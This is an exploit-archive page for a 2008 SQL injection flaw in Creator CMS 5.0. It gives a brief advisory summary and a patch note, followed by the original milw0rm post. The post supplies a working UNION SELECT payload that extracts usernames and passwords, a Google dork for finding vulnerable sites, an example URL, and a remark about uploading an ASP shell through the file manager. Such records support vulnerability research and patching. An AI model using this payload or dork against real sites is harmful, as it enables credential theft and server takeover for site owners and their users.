header-logo
Suggest Exploit
vendor:
Creator CMS
by:
ThE X-HaCkEr From X9 Team (ThE X-HaCkEr & dr.9)
7.5
CVSS
HIGH
SQL Injection
89
CWE
Product Name: Creator CMS
Affected Version From: 5
Affected Version To: 5
Patch Exists: Yes
Related CWE: N/A
CPE: a:cmind:creator_cms:5.0
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: None
2008

Creator CMS 5.0 Remote SQL Injection Vulnerability

Creator CMS 5.0 is vulnerable to a remote SQL injection vulnerability. An attacker can exploit this vulnerability by sending a specially crafted SQL query to the vulnerable application. This can allow the attacker to gain access to the database and execute arbitrary code. The POC for this vulnerability is www.site.com/index.asp?sideid=[SQL], where [SQL] is a specially crafted SQL query. An example of such a query is 1+union+select+concat(username,0x3a,password),2,3+from+login/*. An attacker can also upload an ASP shell through the file manager.

Mitigation:

The vendor has released a patch to address this vulnerability. It is recommended to apply the patch as soon as possible.
Source

Exploit-DB raw data:

# Exploit : Creator CMS 5.0 Remote SQL Injection Vulnerability
#
# Vendor : www.cmind.dk
#
# Founded By : ThE X-HaCkEr From X9 Team ( ThE X-HaCkEr & dr.9)
#     
# Greetz To : tryag.cc & saudihack.com & hackteach.org all muslim
#
# Email : the-x-hacker[@]hotmail[.]fr
#
# Google D0rk : allinurl:index.asp?sideid=

POC : www.site.com/index.asp?sideid=[SQL]

SQL : 1+union+select+concat(username,0x3a,password),2,3+from+login/*

Example : http://www.xxx.dk/index.asp?sideid=28+union+select+concat(username,0x3a,password),2,3+from+login/*

You can upload an asp shell through file manager

Enjoy !!!

# milw0rm.com [2008-09-09]